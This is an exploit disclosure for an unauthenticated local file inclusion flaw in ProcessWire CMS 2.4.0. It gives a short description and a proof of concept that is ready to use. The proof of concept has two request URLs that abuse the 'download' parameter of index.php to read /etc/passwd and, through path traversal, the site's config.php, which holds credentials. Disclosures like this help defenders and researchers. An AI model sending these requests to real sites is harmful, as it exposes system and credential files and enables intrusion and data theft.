# Exploit Title: [Local File Inclusion Processwire CMS 2.4.0]# Vulnerability Type: Unauthenticated LFI# Date: [03.11.2020]# Exploit Author: [Y1LD1R1M]# Type: [WEBAPPS]# Platform: [PHP]# Vendor Homepage: [https://processwire.com/]# Version: [2.4.0]# Tested on: [Kali Linux]** Description **
Local File Inclusion in Processwire CMS 2.4.0 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.** Proof of Concept **
http://URL/index.php?download=/etc/passwd
http://URL/index.php?download=../config.php